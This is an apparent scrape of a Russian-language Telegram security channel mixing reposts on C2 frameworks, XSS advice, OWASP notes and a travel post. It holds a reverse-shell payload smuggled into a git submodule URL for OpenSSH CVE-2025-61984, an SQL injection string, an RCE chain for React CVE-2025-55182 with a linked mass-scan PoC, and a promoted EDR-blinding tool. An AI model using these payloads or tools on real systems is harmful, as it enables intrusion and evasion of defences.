Я пока заграницей и пока нет возможности писать посты до ~8 числа.
Поэтому время от времени буду присылать уже готовые, но годные публикации.
__
🚬 Руководство по взлому зашифрованных сеансов SSH от братушек китаюшек.
Современный взгляд, новые инструменты на основе старых, в общем интересно.
😊 Читать: https://mp.weixin.qq.com/s/ap3iUBkctCCvNx7KYHi0mA
@jpubl
Поэтому время от времени буду присылать уже готовые, но годные публикации.
__
Современный взгляд, новые инструменты на основе старых, в общем интересно.
@jpubl
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек
Adaptix C2 и Cobalt Strike: сравнительный аналитический обзор для специалистов по кибербезопасности
#adaptix #cobalt #C2 #redteam #IoC
Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)
➡️ Введение
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.
➡️ Обзор Adaptix C2
▪️ Архитектура
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.
▪️ Особенности
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.
🔗 blog.poxek
🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#adaptix #cobalt #C2 #redteam #IoC
Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4 3
Читать: https://habr.com/ru/articles/951354/
_
Стамбул довольно красивый город и интересный, но тут всё очень дорого по сравнению в России.
Из недорогих тут одежда и всякие безделушки. Что касается еды, я мог войти в столовку/забегаловку и поесть досыта за 300-400₽ от души. А тут картофель фри средней порции стоит около (~300 лир)500-600₽.
В целом кухня неплохая, в некоторых местах очень вкусно, а в некоторых дорого и невкусно.
В общем, тут приятно проводить время, но не жить.
Пока так длится мой отдых.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8 4 2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13 3
Если и да, даже самые опытные разработчики могут забыть о том, насколько он важен. Да и не только он.
Если один вариантов прокатит, получим такой результат:
var char_source = "hello
world";
SELECT name FROM city_list where city = "Berlin%22 OR city = %22Lyon";
# как итог
SELECT name FROM city_list where city = "Berlin" OR city = "Lyon";
SELECT ... FROM ... WHERE city = ?;
@jpubl
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8 5
Посты J
Часть 2.
🤭 Проблема у OpenSSH как говорят... CVE-2025-61984 - так его называют.
✏️ Суть в том, что когда клонируешь репозиторий, это происходит либо по ssh, либо по https. Проблема может возникнуть когда за выбором стоит ssh с проблемным конфигом. А теперь к деталям.
😱 Вся история начинается в файле ~/.ssh/config
Который выглядит например так:
😳 То есть, для подключений к гитхаб через SSH используется прокси-команда.
• %r - имя пользователя
• %h - адрес
• %p - порт
🎒 Далее картина в файле .gitmodules с подмодулем, который находится в репозитории.
Он может иметь параметр url.
🦈 Для начала убедимся, что готовы принять подключение от реверсшелла:
👺 Сам url, должен иметь полезную нагрузку:
👀 Или %0a вместо \n
Как это работает?
✊ OpenSsh ожидает url, но url является нестандартным(из-за $[ ), из-за чего возникает синтаксическая ошибка.
🤗 И тут в дело вступает "\n", он разбивает команду, позволяя выполнить полезную нагрузку, который в даёт удаленный доступ.
👮 Даже несмотря на самые строгие фильтры, OpenSSH упустила этот момент. Либо недооценили козявку, либо не знали)
@jpubl - просто простые посты🚬
Который выглядит например так:
Host *.example.com
ProxyCommand bash -c 'nc %r@%h %p'
• %r - имя пользователя
• %h - адрес
• %p - порт
Он может иметь параметр url.
nc -l 4444
url=ssh://$[+\nbash -i >& /dev/tcp/<IP>/4444 0>&1\n@foo.example.com:foo
Как это работает?
@jpubl - просто простые посты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3 2 1 1
Есть довольно неплохое колличество различных CTF (например root-me.org) где можно набраться опыта в поиске и эксплуатации xss и узнать каких видов они бывают.
Но стоит делать упор больше сначала на js и тому, какими методами его можно вызвать, а не только за счёт тега noscript, но и за счёт ссылок, атрибутов и прочих файлов, которые поддерживают js(например SVG, которая может показаться безобидной картинкой).
Затем на методы обфускации и кодировки, для обхода фильтров.
Потенциал у xss довольно большой. И заключается не только в угоне сессий. Угон сессий за счёт xss скорее популярное явление, но его можно использовать для подключения рекламных уведомлений, дефейса, если страница имеет разрешение к микрофону или к камере, то свободное использование без запроса на них, заражение компьютера трояном и т.д
Но стоит делать упор больше сначала на js и тому, какими методами его можно вызвать, а не только за счёт тега noscript, но и за счёт ссылок, атрибутов и прочих файлов, которые поддерживают js(например SVG, которая может показаться безобидной картинкой).
Затем на методы обфускации и кодировки, для обхода фильтров.
Потенциал у xss довольно большой. И заключается не только в угоне сессий. Угон сессий за счёт xss скорее популярное явление, но его можно использовать для подключения рекламных уведомлений, дефейса, если страница имеет разрешение к микрофону или к камере, то свободное использование без запроса на них, заражение компьютера трояном и т.д
👍6 5
Owasp top 10 этого года, выдал в свой топ новую категорию. Об этом(А10) я ранее уже писал:
https://news.1rj.ru/str/jpubl/235
Но вот инъекции падают с 3й строчки, на 5ю. Вероятно это связано с появлением ИИ, который показал многим дилетантом, безопасные методы вставки(например при SQL injection), тем не менее, это не исключает возможность существования, а так же другие виды инъекций, благодаря которым распространяются ботнеты.
А03, тоже новая, расширенная категория. Заражённые репы, библиотеки, контейнеры и т.п, объединившись с уязвимыми и устаревшими компоненты ворвались аж до А03
Пост получился краткий, возможно позже распишу подробнее и с примерами.
https://news.1rj.ru/str/jpubl/235
Но вот инъекции падают с 3й строчки, на 5ю. Вероятно это связано с появлением ИИ, который показал многим дилетантом, безопасные методы вставки(например при SQL injection), тем не менее, это не исключает возможность существования, а так же другие виды инъекций, благодаря которым распространяются ботнеты.
А03, тоже новая, расширенная категория. Заражённые репы, библиотеки, контейнеры и т.п, объединившись с уязвимыми и устаревшими компоненты ворвались аж до А03
Пост получился краткий, возможно позже распишу подробнее и с примерами.
👍7
This media is not supported in your browser
VIEW IN TELEGRAM
Максимально простой и лёгкий socks5 прокси клиент, который буквально работает в пару кликов и улучшает пинг в играх(при правильном выборе сервиса). Абсолютно никакого дискомфорта, никаких требований и т.д. Легко, просто и быстро.
Это мой авторский инструмент для одного проекта, но решил вырезать от туда, чтобы был доступен и всем остальным.😊
Оставлю в комментариях
Это мой авторский инструмент для одного проекта, но решил вырезать от туда, чтобы был доступен и всем остальным.
Оставлю в комментариях
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6 4
Рабочий PoC RCE в React CVE-2025-55182
https://github.com/ejpir/CVE-2025-55182-poc — тут добавилось эксплуатация через gadgets
На случай удаления ориг репы https://github.com/szybnev/CVE-2025-55182-poc. В свою версию добавил масс скан через
Схема атаки:
Patch:
https://github.com/ejpir/CVE-2025-55182-poc — тут добавилось эксплуатация через gadgets
На случай удаления ориг репы https://github.com/szybnev/CVE-2025-55182-poc. В свою версию добавил масс скан через
-l и сохранение результато в txt -o, а ещё --cmd для запуска произвольных командСхема атаки:
HTTP POST /formaction
↓
decodeAction(formData, serverManifest) [server.js:111]
↓
loadServerReference(serverManifest, "vm#runInThisContext", ["CODE"])
↓
resolveServerReference() → парсит "vm#runInThisContext" → metadata = [vmId, [], "runInThisContext"]
↓
requireModule(metadata)
↓
moduleExports["runInThisContext"] ← БЕЗ hasOwnProperty проверки!
↓
vm.runInThisContext.bind(null, "CODE")
↓
При вызове: vm.runInThisContext("CODE") → RCE!
Patch:
Уязвимый код (v19.0.0):
// ReactFlightClientConfigBundlerWebpack.js
return moduleExports[metadata[NAME]]; // Строка ~255
Фикс (v19.2.1):
if (hasOwnProperty.call(moduleExports, metadata[NAME])) {
return moduleExports[metadata[NAME]];
}
return (undefined: any);
Forwarded from Freedom Fox 🏴☠
EDR-Redir
Инструмент для редиректа директории #EDR (Endpoint Detection and Response) в другое место. Предотвращает/нарушает работу служб и процессов EDR ;)
Протестировано:
• Microsoft Windows Defender
• Elastic Defend
• Sophos Intercept X
Читать подробнее:
• https://www.zerosalarium.com/2025/10/DR-Redir-Break-EDR-Via-BindLink-Cloud-Filter.html
• https://www.zerosalarium.com/2025/11/EDR-Redir-V2-Blind-EDR-With-Fake-Program-Files.html
#redteam #работягам
Telegram✉️ @freedomfox
Инструмент для редиректа директории #EDR (Endpoint Detection and Response) в другое место. Предотвращает/нарушает работу служб и процессов EDR ;)
Протестировано:
• Microsoft Windows Defender
• Elastic Defend
• Sophos Intercept X
Читать подробнее:
• https://www.zerosalarium.com/2025/10/DR-Redir-Break-EDR-Via-BindLink-Cloud-Filter.html
• https://www.zerosalarium.com/2025/11/EDR-Redir-V2-Blind-EDR-With-Fake-Program-Files.html
#redteam #работягам
Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🐳5 4 2👍1
Я начал новый проект. Назвал его WAVos.
Пока проект сырой, но один из основных функций работает.
Это платформа для р2р звонков, стриминга, подкастов и есть ещё одна деталь, которая понравится абсолютно всем, но буду держать в секрете, пока не наберётся нужная аудитория. Иначе перехватят
На данный момент работают видео и аудио звонки.
Суть проста. Каждый получает индивидуальную ссылку. Ею можно делиться. Любой кто перейдет, может начать звонок с вами.
Никаких регистраций, никаких бд, никаких санкций или ограничений. Просто бери и пользуйся.
Буду рад если поддержите проект WAVos.ru
Дизайн слепил на быструю руку, особенно страницу звонка. Поэтому есть над чем поработать и там. Как в плане дизайна, так и функционала.
В общем. Работаем.
Если вам интересно, как можете помочь, пиши в комментариях.
Пока проект сырой, но один из основных функций работает.
Это платформа для р2р звонков, стриминга, подкастов и есть ещё одна деталь, которая понравится абсолютно всем, но буду держать в секрете, пока не наберётся нужная аудитория. Иначе перехватят
На данный момент работают видео и аудио звонки.
Суть проста. Каждый получает индивидуальную ссылку. Ею можно делиться. Любой кто перейдет, может начать звонок с вами.
Никаких регистраций, никаких бд, никаких санкций или ограничений. Просто бери и пользуйся.
Буду рад если поддержите проект WAVos.ru
Дизайн слепил на быструю руку, особенно страницу звонка. Поэтому есть над чем поработать и там. Как в плане дизайна, так и функционала.
В общем. Работаем.
Если вам интересно, как можете помочь, пиши в комментариях.
👍9 4 3🐳1
Посты J
Я начал новый проект. Назвал его WAVos. Пока проект сырой, но один из основных функций работает. Это платформа для р2р звонков, стриминга, подкастов и есть ещё одна деталь, которая понравится абсолютно всем, но буду держать в секрете, пока не наберётся…
Чуть-чуть завершить работу с дизайном и можно начинать делать возможность создавать стримы.
Довольно сложно делать проект одному, но людям показываю и им нравится, но самое прикольное, что они начинают самостоятельно им пользоваться. Это мотивирует.
То есть, актив уже есть и это очень хорошо.
Довольно сложно делать проект одному, но людям показываю и им нравится, но самое прикольное, что они начинают самостоятельно им пользоваться. Это мотивирует.
То есть, актив уже есть и это очень хорошо.